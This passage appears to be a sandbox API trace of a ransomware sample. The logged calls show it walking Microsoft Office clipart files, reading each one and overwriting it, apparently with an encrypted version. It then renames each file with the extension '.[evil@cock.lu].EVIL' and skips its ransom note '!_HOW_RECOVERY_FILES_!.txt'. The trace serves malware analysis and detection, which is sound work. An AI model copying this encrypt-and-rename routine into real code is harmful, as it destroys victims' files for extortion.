Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212601.wmf.[evil@cock.lu].evil")) returned 1 [0151.953] ??_V@YAXPEAX@Z () returned 0x1 [0151.957] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF", dwFileAttributes=0x200) returned 0 [0151.957] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.957] wcsstr (_Str="J0212685.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.957] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF") returned 69 [0151.957] wcscmp (_String1="J0212685.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.957] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0212685.WMF") returned 0x0 [0151.957] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF") returned 0x45 [0151.957] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212685.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.959] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x199a, lpOverlapped=0x0) returned 1 [0151.962] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.962] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.962] _errno () returned 0x84b1160840 [0151.962] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.962] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x19a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x19a0, lpOverlapped=0x0) returned 1 [0151.963] CloseHandle (hObject=0x1a8) returned 1 [0151.963] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.963] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.963] __uncaught_exception () returned 0x84b1160800 [0151.963] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.963] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212685.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212685.wmf.[evil@cock.lu].evil")) returned 1 [0151.964] ??_V@YAXPEAX@Z () returned 0x1 [0151.968] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF", dwFileAttributes=0x200) returned 0 [0151.968] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.968] wcsstr (_Str="J0212751.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.968] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF") returned 69 [0151.968] wcscmp (_String1="J0212751.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.968] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0212751.WMF") returned 0x0 [0151.968] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF") returned 0x45 [0151.968] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212751.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.970] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x80c, lpOverlapped=0x0) returned 1 [0151.974] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.974] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.974] _errno () returned 0x84b1160840 [0151.974] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.974] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x820, lpOverlapped=0x0) returned 1 [0151.975] CloseHandle (hObject=0x1a8) returned 1 [0151.975] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.975] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.975] __uncaught_exception () returned 0x84b1160800 [0151.975] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.975] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212751.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212751.wmf.[evil@cock.lu].evil")) returned 1 [0151.976] ??_V@YAXPEAX@Z () returned 0x1 [0151.979] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF", dwFileAttributes=0x200) returned 0 [0151.979] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.980] wcsstr (_Str="J0212953.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.980] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF") returned 69 [0151.980] wcscmp (_String1="J0212953.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.980] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0212953.WMF") returned 0x0 [0151.980] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF") returned 0x45 [0151.980] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212953.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.981] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1d4a, lpOverlapped=0x0) returned 1 [0151.984] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.984] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.984] _errno () returned 0x84b1160840 [0151.984] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.984] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1d60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1d60, lpOverlapped=0x0) returned 1 [0151.984] CloseHandle (hObject=0x1a8) returned 1 [0151.984] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.984] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.985] __uncaught_exception () returned 0x84b1160800 [0151.985] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.985] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212953.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212953.wmf.[evil@cock.lu].evil")) returned 1 [0151.986] ??_V@YAXPEAX@Z () returned 0x1 [0151.989] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF", dwFileAttributes=0x200) returned 0 [0151.990] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.990] wcsstr (_Str="J0213243.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.990] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF") returned 69 [0151.990] wcscmp (_String1="J0213243.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.990] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0213243.WMF") returned 0x0 [0151.990] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF") returned 0x45 [0151.990] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213243.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.992] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa5c, lpOverlapped=0x0) returned 1 [0151.995] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.995] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.995] _errno () returned 0x84b1160840 [0151.995] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.995] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa60, lpOverlapped=0x0) returned 1 [0151.995] CloseHandle (hObject=0x1a8) returned 1 [0151.996] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.996] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.996] __uncaught_exception () returned 0x84b1160800 [0151.996] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.996] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213243.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213243.wmf.[evil@cock.lu].evil")) returned 1 [0151.997] ??_V@YAXPEAX@Z () returned 0x1 [0152.001] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF", dwFileAttributes=0x200) returned 0 [0152.001] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.001] wcsstr (_Str="J0213449.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.001] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF") returned 69 [0152.001] wcscmp (_String1="J0213449.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.001] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0213449.WMF") returned 0x0 [0152.001] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF") returned 0x45 [0152.001] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213449.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.003] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf00, lpOverlapped=0x0) returned 1 [0152.007] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.007] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.007] _errno () returned 0x84b1160840 [0152.007] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.007] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf20, lpOverlapped=0x0) returned 1 [0152.007] CloseHandle (hObject=0x1a8) returned 1 [0152.007] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.007] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.007] __uncaught_exception () returned 0x84b1160800 [0152.008] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.008] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213449.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213449.wmf.[evil@cock.lu].evil")) returned 1 [0152.009] ??_V@YAXPEAX@Z () returned 0x1 [0152.012] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF", dwFileAttributes=0x200) returned 0 [0152.012] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.012] wcsstr (_Str="J0214934.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.012] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF") returned 69 [0152.012] wcscmp (_String1="J0214934.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.013] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0214934.WMF") returned 0x0 [0152.013] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF") returned 0x45 [0152.013] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214934.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.015] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7cb6, lpOverlapped=0x0) returned 1 [0152.018] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.018] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.019] _errno () returned 0x84b1160840 [0152.019] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.019] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x7cc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7cc0, lpOverlapped=0x0) returned 1 [0152.019] CloseHandle (hObject=0x1a8) returned 1 [0152.019] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.020] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.020] __uncaught_exception () returned 0x84b1160800 [0152.020] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.020] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214934.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214934.wmf.[evil@cock.lu].evil")) returned 1 [0152.021] ??_V@YAXPEAX@Z () returned 0x1 [0152.024] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF", dwFileAttributes=0x200) returned 0 [0152.025] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.025] wcsstr (_Str="J0214948.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.025] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF") returned 69 [0152.025] wcscmp (_String1="J0214948.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.025] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0214948.WMF") returned 0x0 [0152.025] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF") returned 0x45 [0152.025] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214948.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.027] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xaefa, lpOverlapped=0x0) returned 1 [0152.030] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.030] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.030] _errno () returned 0x84b1160840 [0152.030] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.030] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0xaf00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xaf00, lpOverlapped=0x0) returned 1 [0152.030] CloseHandle (hObject=0x1a8) returned 1 [0152.030] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.031] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.031] __uncaught_exception () returned 0x84b1160800 [0152.031] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.031] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214948.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214948.wmf.[evil@cock.lu].evil")) returned 1 [0152.032] ??_V@YAXPEAX@Z () returned 0x1 [0152.035] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF", dwFileAttributes=0x200) returned 0 [0152.036] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.036] wcsstr (_Str="J0215070.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.036] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF") returned 69 [0152.036] wcscmp (_String1="J0215070.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.036] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0215070.WMF") returned 0x0 [0152.036] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF") returned 0x45 [0152.036] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215070.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.038] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2d6c, lpOverlapped=0x0) returned 1 [0152.041] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.041] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.041] _errno () returned 0x84b1160840 [0152.041] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.041] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2d80, lpOverlapped=0x0) returned 1 [0152.042] CloseHandle (hObject=0x1a8) returned 1 [0152.042] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.043] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.043] __uncaught_exception () returned 0x84b1160800 [0152.043] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.043] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215070.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215070.wmf.[evil@cock.lu].evil")) returned 1 [0152.044] ??_V@YAXPEAX@Z () returned 0x1 [0152.047] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF", dwFileAttributes=0x200) returned 0 [0152.047] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.047] wcsstr (_Str="J0215076.WMF", 